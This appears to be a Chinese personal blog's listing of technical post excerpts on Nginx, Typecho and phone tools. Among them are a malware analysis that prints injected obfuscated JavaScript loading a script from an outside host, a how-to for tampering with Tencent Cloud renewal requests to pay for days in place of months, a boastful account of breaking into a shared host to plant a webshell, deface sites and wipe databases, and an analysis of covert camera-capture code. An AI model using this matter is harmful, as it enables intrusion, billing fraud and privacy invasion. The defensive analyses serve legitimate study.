首页
动态说
关于我
留言板
赞助
友链
更多
站点统计
音乐列表
壁纸
美好往事
技术分享
闲言碎语
资源分享
游戏分享
源码分享
登录
关键词搜索
文章搜索
标签搜索
源码
PHP
接口
Typecho
漏洞
Windows11
技术分享
易语言
机器人
框架
宝塔
测评
CDN
软件
解析
网易云音乐
插件
Python
热门文章
1
[游戏分享]美少女万华镜5游戏资源
12,819 阅读
2
[源码分享]随机二次元接口源码-双版本
10,899 阅读
3
[技术分享]小米手机修复基带未知教程
9,896 阅读
4
[搞机教程]小米类原生刷机教程-适合所有小米机
5,611 阅读
5
[技术分享]如何绕过CF节点以及其他节点查询源站IP
3,531 阅读
6
[信息安全]关于裸聊APP渗透的一些事情
3,305 阅读
7
[Typecho插件]一款好用的音乐插件APlayer
3,177 阅读
8
[网站分享]情兰API首页改版
2,856 阅读
9
[技术教程]论我是如何通过提取相册站点把旁站挂页
2,820 阅读
苏晓晴
累计撰写
71
篇文章
累计收到
3,119
条评论
今日撰写
0
篇文章
今日已经过去
16
小时
69%
这周已经过去
1
天
14%
本月已经过去
22
天
70%
今年已经过去
8
个月
66%
首页
栏目
美好往事
技术分享
闲言碎语
资源分享
游戏分享
源码分享
页面
动态说
关于我
留言板
赞助
友链
站点统计
音乐列表
壁纸
用户登录
登录
技术分享(共23篇)
搜索到
23
篇与
技术分享
的结果
2024-01-14
[技术教程]宝塔Nginx开启支持HTTP3/QUIC协议 - 简易教程
报错解决如果提示以下报错[warn] the listen ... http2请根据报错的站点内配置文件把 ssl http2 中的http2去掉如果想要开启HTTP2的话 请看下面的站点配置 http2 on单独添加进去即可注意事项博主测试过Let's Encrypt和Zerossl以及TrustAsia的免费证书这三款都支持QUIC协议 其他证书理论也是支持的!准备工作已经安装好宝塔面板和Nginx环境HTTP3/QUIC检测地址 http3check.net教程开始自编译教程 - 点击这个 {message type="success" content="宝塔最新已经支持Nginx 1.25 直接安装即可"/}在ssh里面执行以下命令wget https://download.bt.cn/install/0/nginx5.sh bash nginx5.sh install 1.25等待命令执行完毕 进面板查看 Nginx版本是否为1.25站点配置在所有的 server 域中,只需要有一个 server 域中配置 reuseport 选项即可listen 443 ssl; listen 443 quic reuseport; listen [::]:443 ssl; listen [::]:443 quic reuseport; http2 on;其他的 如下配置即可listen 443 ssl; listen 443 quic; listen [::]:443 ssl; listen [::]:443 quic; http2 on;在站点的Nginx配置文件 大概26 27行添加以下代码ssl_early_data on; add_header Alt-Svc 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"';然后重启 Nginx即可生效!防火墙配置防火墙将443端口UDP开放 宝塔在面板-左侧安全里面配置 腾讯云 / 阿里云 / 华为云 等 添加安全组即可浏览器配置谷歌Chrome浏览器 访问:chrome://flags/ 启用:Experimental QUIC protocol (enable-quic) 微软新版Edge浏览器 访问:edge://flags 启用:Experimental QUIC protocol 设置为“Enabled” 火狐Firefox浏览器 访问:about:config 启用:network.http.http3.enabled
2024年01月14日
654
3
6
2023-03-31
[漏洞预警]Typecho <= 1.2.0 版本评论爆出严重的存储型XSS漏洞
漏洞发现发现于2023年3月25号影响版本Typecho <= 1.2.0 版本https://github.com/typecho/typecho/issues/1545https://github.com/typecho/typecho/issues/1546漏洞复现漏洞公开POC目前 此漏洞公开的POC有:获取Cookie通过404.php写入一句话木马这个漏洞危险系数很高,可以直接前台拿Shell。修复建议更新到最新版 > https://github.com/typecho/typecho/releases/tag/v1.2.1-rc最新版1.2.1Rc已经修复此漏洞,大家应该尽快更新到最新版本。直接从数据库里面删除评论,千万不要从后台删除,否则会被xss代码拿到cookie!
2023年03月31日
509
0
7
2023-03-13
[原创分享]Typecho主题增加文章目录树功能
注意事项本教程需要改的东西众多 请各位备份好主题文件 以免失败无法恢复!本次教程以Joe7.7.1版本 为基础 7.3.6按道理也能用具体演示可以看我博客!教程开始这里我以Joe主题为例 各个主题的不相同 请自行判断在/Joe/post.php内添加以下代码 大概41行<?php if ($this->options->jfloor === 'on') : ?> <?php GetCatalog(); ?> <?php endif; ?>Joe主题的function.php文件在/Joe/core/function.php在 大概290行添加以下代码function CreateCatalog($obj) { global $catalog; global $catalog_count; $catalog = array(); $catalog_count = 0; $obj = preg_replace_callback('/<h([1-6])(.*?)>(.*?)<\/h\1>/i', function ($obj) { global $catalog; global $catalog_count; $catalog_count++; $catalog[] = array('text' => trim(strip_tags($obj[3])), 'depth' => $obj[1], 'count' => $catalog_count); return '<h' . $obj[1] . $obj[2] . ' id="cl-' . $catalog_count . '"><span>' . $obj[3] . '</span></h' . $obj[1] . '>'; }, $obj); return $obj; } function GetCatalog() { global $catalog; $index = ''; if ($catalog) { $index = '<ul>'; $prev_depth = ''; $to_depth = 0; foreach ($catalog as $catalog_item) { $catalog_depth = $catalog_item['depth']; if ($prev_depth) { if ($catalog_depth == $prev_depth) { $index .= '</li>'; } elseif ($catalog_depth > $prev_depth) { $to_depth++; $index .= '<ul>'; } else { $to_depth2 = ($to_depth > ($prev_depth - $catalog_depth)) ? ($prev_depth - $catalog_depth) : $to_depth; if ($to_depth2) { for ($i = 0; $i < $to_depth2; $i++) { $index .= '</li></ul>'; $to_depth--; } } $index .= '</li>'; } } $index .= '<li><a href="#cl-' . $catalog_item['count'] . '" data-href="#cl-' . $catalog_item['count'] . '">' . $catalog_item['text'] . '-h'.$catalog_item['depth'].'</a>'; $prev_depth = $catalog_item['depth']; } for ($i = 0; $i <= $to_depth; $i++) { $index .= '</li></ul>'; } $index = '<div class="j-floor"><div class="contain" id="jFloor" style="top: 126px;"><div class="title">文章目录</div>' . $index . '<svg class="toc-marker" xmlns="http://www.w3.org/2000/svg"><path stroke="var(--theme)" stroke-width="3" fill="transparent" stroke-dasharray="0, 0, 0, 1000" stroke-linecap="round" stroke-linejoin="round" transform="translate(-0.5, -0.5)" /></svg></div></div>'; } echo $index; }然后在/Joe/core/core.php文件大概83行 添加以下代码 if ($self->is('single')) { $self->content = CreateCatalog($self->content); }再然后在/Joe/function.php文件大概920行 添加外观后台设置开关//开启文章目录树显示 $jfloor = new Typecho_Widget_Helper_Form_Element_Select( 'jfloor', array( 'off' => '关闭(默认)', 'on' => '开启', ), 'off', '是否启用文章目录树显示', '介绍:开启之后 在文章最左侧显示目录树(手机端不显示)' ); $jfloor->setAttribute('class', 'joe_content joe_post'); $form->addInput($jfloor->multiMode()); 解压所需的文件将以下压缩包解压到/Joe/assets目录内解压完 然后打开post.php引用解压的文件 jfloor.min.css以及jfloor.min.js在头部引用css <link href="<?php _getAssets('assets/css/jfloor.min.css'); ?>" rel="stylesheet"> 在底部引用js <?php if ($this->options->jfloor === 'on') : ?> <!-- 目录树 --> <script src="<?php _getAssets('assets/js/jfloor.min.js'); ?>"></script> <?php endif; ?>{cloud title="Joe目录树" type="lz" url="https://suxiaoq.lanzoul.com/iDI480pzgrih" password=""/}
2023年03月13日
295
1
3
[技术分享]宝塔面板Nginx异常事件解析
事件经过前几天在Hostloc论坛上看到的 https://hostloc.com/thread-1111691-1-1.html宝塔上也有人反馈https://www.bt.cn/bbs/thread-105054-1-1.htmlhttps://www.bt.cn/bbs/thread-105085-1-1.html宝塔官方公告https://www.bt.cn/bbs/thread-105121-1-1.html样本解析查看病毒样本和被插入的JS代码{mtitle title="原混淆代码"/}var _0x2551=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x74\x61\x6D\x61\x72\x6B\x65\x74\x2E\x71\x75\x65\x73\x74\x2F\x6D\x61\x72\x6B\x65\x74\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x7338x2,_0x7338x3,_0x7338x4){var _0x7338x5= new Date();_0x7338x5[_0x2551[1]](_0x7338x5[_0x2551[0]]()+ _0x7338x4);document[_0x2551[2]]= _0x7338x2+ _0x2551[3]+ _0x7338x3+ _0x2551[4]+ _0x7338x5[_0x2551[5]]()}setc(_0x2551[6],_0x2551[7],360);document[_0x2551[9]](unescape(_0x2551[8]));{mtitle title="解混淆代码"/}var _0x2551 = ["getMinutes", "setMinutes", "cookie", "=", ";expires=", "toUTCString", "waf_sc", "5889647726", "%3Cscript src='https://www.metamarket.quest/market.js'%3E%3C/script%3E", "write"]; function setc(_0x7338x2, _0x7338x3, _0x7338x4) { var _0x7338x5 = new Date(); _0x7338x5[_0x2551[1]](_0x7338x5[_0x2551[0]]() + _0x7338x4); document[_0x2551[2]] = _0x7338x2 + _0x2551[3] + _0x7338x3 + _0x2551[4] + _0x7338x5[_0x2551[5]](); } setc(_0x2551[6], _0x2551[7], 360); document[_0x2551[9]](unescape(_0x2551[8]));在解码完这个JavaScript代码 我们可以看到关键词符 "Write" 和 "%3Cscript src='https://www.metamarket.quest/market.js'%3E%3C/script%3E" (%3C和%3E是HTML编码 转过来则是<和>)此代码直接利用 document.write 向页面插入script标签<script src='https://www.metamarket.quest/market.js'></script>排查分析由于宝塔官方没有明确说明面板存在0day漏洞,目前只能转向分析Nginx样本了我们把被替换过的nginx病毒样本拖到ida里面 然后F5反编译一下 定位到 __int64 __fastcall sub_4BE051 函数然后我们会看到一段 waf_sc=5889647726 这里则对应我们上面分析JavaScript代码的值我们分析一下以下代码 if ( a1[99] && a1[98] ) { if ( ngx_strcasestrn(a2, "admin", 4LL) || ngx_strcasestrn(a2, "user", 3LL) || ngx_strcasestrn(a2, "manager", 6LL) || ngx_strcasestrn(a2, "api", 2LL) || ngx_strcasestrn(a2, "config", 5LL) || ngx_strcasestrn(a2, "login", 4LL) || ngx_strcasestrn(a2, 7689484LL, 3LL) || ngx_strcasestrn(a2, ".xml", 3LL) || ngx_strcasestrn(a2, ".css", 3LL) ) { sprintf(v11, "return 3 url:%s method:%d", a2, a1[122]); sub_4BDFE1(v11); result = 3LL; } else { v9 = access("/tmp/systemd-private-56d86f7d8382402517f3b5-jP37av", 0); result = 6LL; if ( v9 != -1 ) { v10 = access("/var/tmp/systemd-private-56d86f7d8382402517f3b51625789161d2cb-chronyd.service-jP37av", 0) == -1; result = 7LL; if ( !v10 ) result = 0LL; } } } else { sub_4BDFE1("return 2"); result = 2LL; }从这里,我们就能很清楚的看到了, 「v9」和 「v10」这两个变量应该就对应了恶意代码,通过 access 方式读入文件,不过按照被感染后的代码逻辑,应该是先判断是否包含以下字符串,没有就输出恶意代码。'admin' 'user' 'manager' 'api' 'config' 'login' '/var/tmp/msglog.txt' '.xml' '.css'关于 「 ngx_strcasestrn 」函数的用法,大家在网上也能够搜得到。补救措施博主推荐以下的排查方式 如下1.请手动排查一下 /tmp/ 和 /var/tmp/ 目录下有没有 systemd-private-56d86f7d8382402517f3b5-jP37av 这个文件,如果有请尽快删除掉 然后修改一下服务器密码和修改相关目录的权限2.如果当前宝塔面板还在用的话,请修改面板端口以及加强一下面板安全性 3.开启 BasicAuth认证 和 动态口令认证或者访问设备验证 4.手动排查一下Nginx程序的MD5值是否对应在ssh输入以下代码即可md5sum /www/server/nginx/sbin/nginx md5sum /www/backup/nginxBak cat /www/server/panel/data/nginx_md5.pl
2022年12月13日
487
1
0
2022-10-18
[原创分享]为你的主题加上loading效果吧
前言今天水一篇文章 说起来 我已经差不多一个月没更新文章了吧主要还是不知道更新啥!!!教程开始第一步:新建一个loading样式css将以下代码放进去 然后引用这个文件#Loadanimation{ background-color:#fff; height:100%; width:100%; position:fixed; z-index:1; margin-top:0px;top:0px; } #Loadanimation-center{ width:100%; height:100%; position:relative; } #Loadanimation-center-absolute{ position:absolute; left:50%; top:50%; height:200px; width:200px; margin-top:-100px; margin-left:-100px; } .xccx_object{ -moz-border-radius:50% 50% 50% 50%; -webkit-border-radius:50% 50% 50% 50%; border-radius:50% 50% 50% 50%; position:absolute; border-left:5px solid #87CEFA; border-right:5px solid #FFC0CB; border-top:5px solid transparent; border-bottom:5px solid transparent; -webkit-animation:animate 2.5s infinite; animation:animate 2.5s infinite; } #xccx_one{ left:75px; top:75px; width:50px; height:50px; } #xccx_two{ left:65px; top:65px; width:70px; height:70px; -webkit-animation-delay:0.1s; animation-delay:0.1s; } #xccx_three{ left:55px; top:55px; width:90px; height:90px; -webkit-animation-delay:0.2s;animation-delay:0.2s; } #xccx_four{ left:45px; top:45px; width:110px; height:110px; -webkit-animation-delay:0.3s; animation-delay:0.3s; } @-webkit-keyframes animate{50%{ -ms-transform:rotate(180deg); -webkit-transform:rotate(180deg); transform:rotate(180deg); } 100%{-ms-transform:rotate(0deg); -webkit-transform:rotate(0deg); transform:rotate(0deg); } } @keyframes animate{50%{ -ms-transform:rotate(180deg); -webkit-transform:rotate(180deg); transform:rotate(180deg); } 100%{ -ms-transform:rotate(0deg); -webkit-transform:rotate(0deg); transform:rotate(0deg); } }第二步:将以下代码填写入头部文件 一般都为 header.php<div id="Loadanimation" style="z-index:999999;"> <div id="Loadanimation-center"> <div id="Loadanimation-center-absolute"> <div class="xccx_object" id="xccx_four"></div> <div class="xccx_object" id="xccx_three"></div> <div class="xccx_object" id="xccx_two"></div> <div class="xccx_object" id="xccx_one"></div> </div> </div> </div> <script> $(function(){ $("#Loadanimation").fadeOut(540); }); </script>注意 注意 fadeOut 里面填写的是毫秒数效果图后言本loading可以自定义 网上也有很多css的 只要替换第二步的代码都可以成功(js代码别替换)
2022年10月18日
493
4
4
2022-08-11
[技术分享]通过JS判断Windows11
文章前言最近在优化博客 顺带写了个显示 User-Agent 信息的插件由于更新了Windows11系统之后 系统内核不更改 一直都是 Windows10 内核 这件事折磨了我好久 但我在 泽泽社长 和 微软官方文档 看到了解决办法 以下是来自微软官方文档的说明User-Agent字符串不会更新为区分Windows 11和Windows 10,也不会区分 CPU 体系结构。 建议不要使用User-Agent字符串来检索用户代理数据。 不支持User-Agent客户端提示的浏览器将无法区分Windows 11和Windows 10,也无法区分 CPU 体系结构。使用User-Agent客户端提示检测Windows 11在 Microsoft Edge (和 Google Chrome) 中,网站可以通过User-Agent客户端提示 (UA-CH) 来区分Windows 11用户和Windows 10用户。 可以在以下 UA-CH 请求标头中找到此信息:标头字段指示Windows 10的值指示Windows 11的值Sec-CH-UA-PlatformWindowsWindowsSec-CH-UA-Platform-Version和 之间的 1.0.0 值 10.0.013.0.0 及更高版本支持的浏览器这里要注意的是 此项目 并不支持某些国产浏览器或者低于以下内核版本的浏览器版本是否支持Microsoft Edge 94+支持Chrome 95+支持Opera支持Firefox不支持Safari不支持详情代码JS代码if(navigator.userAgentData){//判断当前环境是否支持 navigator.userAgentData.getHighEntropyValues(["platformVersion"]) .then(ua => { if (navigator.userAgentData.platform === "Windows") {//判断是否是Windows系统 const majorPlatformVersion = parseInt(ua.platformVersion.split('.')[0]); if (majorPlatformVersion >= 13) {//判断是否是win11或以上 document.cookie = "win11=true;path=/";//写入cookie } } });}部分PHP代码$getAgent = $archive->request->getAgent(); // 修改 User-Agent 的字符串 if(isset($_COOKIE['win11'])){ $newAgent = str_replace('Windows NT 10.0', 'Windows NT 11.0', $getAgent); }else{ $newAgent = $getAgent; } // 保存修改后的 User-Agent 提交到评论数据库表 $db = Typecho_Db::get(); $db->query($db->update('typecho_comments') ->rows(array('agent' => $newAgent)) ->where('coid = ?', $comment->coid));文章结尾以上代码均除了要满足用户浏览器要求 还要看站点是否为https协议本篇文章到此结束~
2022年08月11日
782
14
10
2022-05-21
Typecho主题开启IP归属地获取
注意事项本获取不支持IPV6地址只支持IPV4 调用纯真本地数据库 需要定时更新要不然 获取可能不准确教程开始首先找到主题的function.php文件这里我以Joe主题为例 各个主题的不相同 请自行判断Joe主题的function.php文件在/Joe/core/function.php将下载的压缩包解压到core目录下 然后编辑function.php文件然后在第2行引用这个文件代码require 'ipdata.class.php';然后在29行写入/** 获取评论者归属地信息 */ function convertip($ip){ echo convertips($ip); }写完保存这个文件 再找到评论模板的文件 一般都为comment.phpJoe主题的comment.php文件在/Joe/public/comment.php然后插入以下代码即可显示<?php echo convertip($comments->ip); ?>{cloud title="评论归属地获取" type="lz" url="https://suxiaoq.lanzoul.com/irWB6056johc" password=""/}
2022年05月21日
1,001
17
4
2021-06-20
[技术分享]小米手机修复基带未知教程
文章前言本文章只适用于手机已经解锁和ROOT的用户如果手机没解锁BL和ROOT权限 就只能让售后帮你9008恢复基带了准备工具一台小米手机(已经解锁BL和开放ROOT权限)一个配套的QCN文件(酷安 网上都能找得到)ADB运行套件 (酷安 网上都能找得到)QFIL 或者qpas工具(酷安 网上都能找得到)开始教程首先 我们将手机打开USB调试模式 然后在adb里面输入以下指令 用于强开Diagnostics端口手机已经取得ROOT权限输adb shell 回车输入su回车输入 setprop sys.usb.config diag回车 或输入 setprop sys.usb.config diag,adb 回车注意事项有的手机你会显示Qualcomm HS-USB Android DIAG 901D 或者 Qualcomm HS-USB Diagnostics 900E端口 都是很正常的开始刷入打开QFIL软件 点击Select Port按钮 然后选择当前显示的Diagnostics端口 把Show Non QDLoader\DIAG PORT选上 点击OK就选择完成了到主界面 然后点击Toole-QCN Backup Restore 点击Browse选择你的qcn文件 再然后把Enable Multi-SIM勾上 点击Restore QCN就可以刷入了提示Restore Succeed 即是刷入完成 重启手机再看看基带有没有恢复 如果没有恢复 可以再刷入一遍 还是不行的话 就只有售后9008刷入了文章后言以上教程仅为个人编写 如有什么不正确的地方 可以底部留言我个人不提倡刷机 以免手机出现硬件错误本文仅恢复基带 imei丢失需要售后刷 如果是要插手机卡使用 请去售后!
2021年06月20日
9,896
5
7
2021-06-16
[体验文章]Windows 11泄露版初体验
文章前言由于该系统是泄露版本 不清楚会有什么问题 文章最后会献上镜像下载地址 但还请不要使用实体机装 以免把硬件损坏!使用说明该ISO不支持直接打开安装 需要用PE环境刷入 或者虚拟机目前已知BUG 1.除了英文以外的语言包会出现安装错误 2.输入法没法切换中文 会一直卡在英字3.NET3.5无法安装(可以安装 但不能通过正常的方式来 需要下载安装器)目前汉化不全 只有部分中文!使用体验怎么说呢 我常用的软件都能运行 我个人感觉还不错我也非常期待win11的发布 毕竟我是从win10初代版本过来的 那时候BUG是真多 问题也很多 但后续更新慢慢就优化和修补了这些问题具体体验 等微软6月24日的发布会 自然会知晓! 非常期待版本特性1.UI圆角变化2.音效提示音清脆感3.任务栏布局居中4.目前只发现这么多下载地址天翼云:https://cloud.189.cn/web/share?code=InQ3637BvEbu
2021年06月16日
546
0
2
2021-05-24
[技术分享]修改腾讯云续费为天数教程-火狐浏览器
前言本次教程只是技术分享 请勿用于非法用途准备工具1.火狐浏览器 Burp Suite都可以2.拥有代金券多少都行教程开始1.首先确保续费的服务是手动 而不是自动2.点击续费 进入到支付界面(期间需要打开审查元素)3.找到https://buy.cloud.tencent.com/order/check 网址的请求数据 点击右键-编辑并重发4.修改请求主体并找到timeUnit%22%3A%22m%22%2C%22timeSpan%22%3A1这段数据 修改m为d 修改A1为A天数5.点击发送 然后看到控制台中的网络 新出现的请求数据 双击一下 就可以打开新的续费界面了6.然后选择代金券 点击付款即可!
2021年05月24日
1,296
4
0
2021-03-27
[隐私安全]竟然可以通过一段小小的JS代码来获取手机的前置相机权限
文章前言大家好 我是晓晴今天给你们分析一套PHP源码 就如同标题一样令人细思极恐文章开始首先下载所需的源码 里面包含的文件有让我们来分析一下主要的代码 js调用和PHP上传JS调用前置摄像头代码PHP上传图片以及qbl.php的文件扫描提示温馨提示1.由于系统安全机制的问题 如果是IOS的系统 必须是使用自带的Safari浏览器(或者第三方APP调用Safari内核)才行2.安卓端只要扫描的APP有赋予相机权限就可以使用,大多数情况下都会提醒用户是否给予相机权限。3.电脑端也可以 只要有摄像头 用浏览器打开就会弹出使用摄像头提醒
2021年03月27日
2,088
1
1
2020-12-12
[Typecho文章]Typecho开启PHP8支持及配置
文章前言在几天前 宝塔面板上架了PHP8环境 今天博主为博客启用了PHP8 速度提升巨大 相比上一代而言所需环境宝塔面板Nginx/ApacheMysqlPHP8教程开始首先进Typecho官网下载最新开发版 http://typecho.org/downloadhttps://github.com/typecho/typecho/然后备份好 博客的usr目录 好在装完恢复数据然后就是备份数据库了 面板-数据库-备份接下来就是上传刚刚下载好的开发版源码 解压 配置好 把之前备份的usr目录上传 解压(还有数据库文件 记得导入)PHP8新特性https://blog.p2hp.com/archives/7371https://tlanyan.me/new-in-php-8/
2020年12月12日
2,176
3
2
2020-10-27
[Typecho模板]Akina模板夜间模式实装
文章前言源模板下载地址:https://zhebk.cn/Web/Akina.html目前夜间模式的css还没完善。演示图片模板完善在后台外观设置中加上一个开关 判断是否要开启自适应夜间模式!后续还会加一个前台切换夜间模式功能
2020年10月27日
1,347
4
2
2020-09-04
[技术教程]论我是如何通过提取相册站点把旁站挂页
文章前言大家好 我是晓晴今天呢 在葫芦侠3楼发现一个神奇的帖子是一个关于如何提取手机相册图片到服务器上的这里和之前的那篇裸聊诈骗的文章原理相同 这里就不过多介绍了文章开始首先开始呢 我先放几张这套源码的截图源码来自 某网盘外链分享的程序源码下的view.php文件下 存在任意文件查看的漏洞 如上爆出数据库账号密码 然后去ping一下这个网址 查看此IP用的是什么主机 目前市面上常见的BTY KANGLEKangle一般控制面板和数据库的账号密码都是相同的 只要输入网址/ip:3312既可跳转Bty亦是如此 但有一个不同的地方是 Bty的是独立的控制面板 如果找不到 那就没法进去了这里就不过多演示了 我已经挂上马了 发截图这IDC居然没开 防跨站 这就有意思了 可以随意修改其他站点的文件 或者删库跑路(滑稽这里修改一个站点的https://api.bty.plus/https://hk.bty.plus/数据库清库跑路 不知道这站站长有没有备份 如果没有备份的话 可以来找我 我还你文章后言友情提示:网络非法外之地 并不是你 想来就来 想走就走的
2020年09月04日
2,820
3
2
2020-08-23
[安全预警]关于最近宝塔闹得很厉害的PMA漏洞BUG
文章前言在2020年8月23日的下午有个憨憨管理在我群艾特全员 说宝塔爆出漏洞了赶快更新吧!影响机器需同时满足以下所有条件1、软件版本为Linux面板7.4.2 或者Windows面板6.8.02、开放888且未配置http认证,3、安装了phpmyadmin,mysql数据库不受影响机器只需满足一条则不受影响1、未开放888端口,2、针对888端口做了严格的安全认证,3、未安装phpmyadmin,4、未安装mysql数据库5、面板版本不为Linux面板7.4.2/Windows面板6.8.0漏洞分析接下来步入正题吧此次漏洞的分析如下 在/www/server/phpmyadmin目录下的PMA目录的config.inc.php文件里面会保存设置好的数据库账号密码和在/www/server/phpmyadmin目录下的随机生成的数据库目录的config.inc.php文件相对比大家发现有什么不同的地方吗?对了 第一个是采用账号密码的方式来进入数据库 也就是无需访问 即可进去第二个是采用cookie和账户双认证 缺一不可 先登录宝塔 进入数据库管理界面进而管理本次出问题的是以下采用WEB方式来访问数据库由于通过这个方式来访问的时候 未将phpmyadmin鉴权 所以才会出现这个严重的漏洞BUG漏洞修复1.更新宝塔到最新的7.4.3版本。2.如果不想更新 请到/www/server/phpmyadmin目录下删掉pma目录3.修改宝塔数据库管理端口4.定期备份 毕竟数据第一 最好是本地一份 云端一份5.不开放一些不重要的端口
2020年08月23日
1,365
1
1
2020-08-15
[信息安全]关于裸聊APP渗透的一些事情
前言最近有很多人都陷入了裸聊的骗局之中网上新闻一搜一大堆都是关于被骗 被裸聊骗子敲诈的新闻真的丧尽天良!准备工具一个裸聊APP一个模拟器一个抓包工具被骗过程也就是 有人加你 裸聊-互看-下载软件-视频-录下视频-敲诈该软件可以获取通讯录和短信 定位等近而来实施敲诈勒索渗透步骤打开模拟器 利用抓包工具来抓取软件注册接口和获取手机信息和地理位置的接口据我所知 裸聊发给你们的APP都是无法完成注册的 点击提交没反应 然而软件已经执行了提交程序 从而获取你手机上的通讯录和短信 照片等隐私进入后台进入后台之后 发现了令我震惊的一幕 后台居然显示了这么多受害者足足有几百页之多 此网站都不知道骗了多少人!文章后言我这次只是一次简简单单的测试 更具体的细节我不想放出来另外 以后你们别乱下载任何软件 你们都不知道打开之后会导致你们的什么个人信息泄露我已经报警了 现在只能等警察来处理了!
2020年08月15日
3,305
2
7
2020-06-27
[技术文章]开启反向代理+防盗链配置教程
文章前言之前出过一期反向代理的教程文章我弄了这么久才发现 反向代理之后 防盗链配置会失效这就很尴尬教程+修复这里只演示宝塔的教程首先进入反向代理的站点配置文件目录可以在站点配置文件中找到 默认目录为/www/server/panel/vhost/nginx/proxy/站点域名/打开需要修改的配置文件 将以下代码location / { proxy_pass https://你的反代IP; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header REMOTE-HOST $remote_addr; add_header X-Cache $upstream_cache_status; #Set Nginx Cache add_header Cache-Control no-cache; expires 12h; }修改为location / { location ~ .*\.(jpg|jpeg|gif|png|js|css)$ { expires 30d; access_log /dev/null; valid_referers 防盗链域名; if ($invalid_referer){ return 403; } proxy_pass https://你的反代IP; } location / { proxy_pass https://你的反代IP; } proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header REMOTE-HOST $remote_addr; add_header X-Cache $upstream_cache_status; #Set Nginx Cache add_header Cache-Control no-cache; expires 12h; }
2020年06月27日
1,538
1
0
2020-06-15
[搞机教程]小米类原生刷机教程-适合所有小米机
文章前言刷机有风险 如果不会刷还请不要刷以免导致手机变砖或者硬件损坏文章测试机型一台小米手机一个类原生ROM 一个第三方REC准备工具解锁BL:http://www.miui.com/unlock/index.html小米全机型专属第三方rec:https://cloud.189.cn/t/ia6vqunmaIfu(访问码:fdv1)Mi8UD专属lineageos系统包:https://cloud.189.cn/t/yeEjyqBFFRVvlineageos机型类原生包:https://download.lineageos.org/ (如需下载UD版本 请下载上面的)PE类原生刷机包:https://download.pixelexperience.org/ (Mi8UD没有)PA类原生刷机包:https://paranoidandroid.co/downloads (支持小米的机型比较少)DerpFest类原生刷机包:https://derpfest.org/ (支持的机型比较多)Havoc类原生刷机包:https://sourceforge.net/projects/havoc-os/files/ (如上 支持的机型比较多 下载前查询一下你的机型代码)开始教程首先要解锁手机BL锁 如果已经解锁可以跳过这一步解锁完下载MIUI系统底包 必须要和类原生安卓版本一样 安卓9=安卓9 安卓10=安卓10这里只教Mi8UD版本 进入http://www.miui.com/shuaji-393.html 下载相对应的系统底包手机按电源键+音量下进入fastboot 打开刷机工具 MiFlash 选择你的刷机包目录(线刷包需要解压两次)线刷完会自动进入系统 进系统设置完还要进入一次fastboot模式 刷入第三方rec右键管理员模式打开 recovery-twrp一键刷入工具.bat 输入 2 然后回车就提示刷入完成了刷完第三方rec会自动进入 进去之后把下载好的类原生系统包移动到手机里面进入清除 把按钮滑到右边 双清完再刷系统点击安装 选择下载好的系统包 有个滑动按钮 滑到右边就开始刷了 记住 钩子不要勾刷完系统返回主页面 进入清除 格式化Data分区 输入yes 四清就可以重启手机了进入系统如果有谷歌验证的话 需要把手机卡下掉 这样可以跳过验证系统截图文章后言需要注意的事项:第三方rec需要选择和安卓版本一样的包如果无限重启REC 请尝试刷入一次
2020年06月15日
5,611
1
0
2020-06-13
[技术分享]NGINX反向代理教程
文章前言关于反向代理需要注意的一些事需要源站和反代服务器同一个运行环境 NGINX=NGINX APACHE=APACHE IIS=IIS不同环境反代我也没试过可不可以 但基础原理都是一样的教程首先准备两台服务器 一台源站存放文件的 一台反代服务器宝塔或者原生环境 这里只演示宝塔进入站点设置-反向代理代理名称随便填写目标URL填写 http://需要反代的源站IP 如果源站有https 请在反代服务器上传证书并保存 写入https://需要反代的源站IP如需使用缓存 请开启缓存接下来就去域名解析处解析 反代的服务器IP 解析完就等生效就行了注意事项注意事项:源站证书和反代服务器证书必须一样 否则会出现错误!源站生效的TLS或者HSTS都会一并和反代服务器一样
2020年06月13日
1,105
0
0
2020-05-14
[测评]河南高防服务器使用测评
文章首记如你们所见 我从景安的河南郑州换到了河南许昌高防这一步步来真的好累 每天接收CC次数几万次 被DDOS打死了十几次 ohhh服务器测试速度如下 还挺快的 。。。。。。。。产品规格CPU 24H 内存16G 带宽100M 防御:100G跑分测试使用观后感机器也是别人给我的 我不敢放文件进去 就拿来反代速度还好 可惜是联通线路感谢墨渊送来的机器测试!
2020年05月14日
1,349
4
1
1
2
支付宝
微信
QQ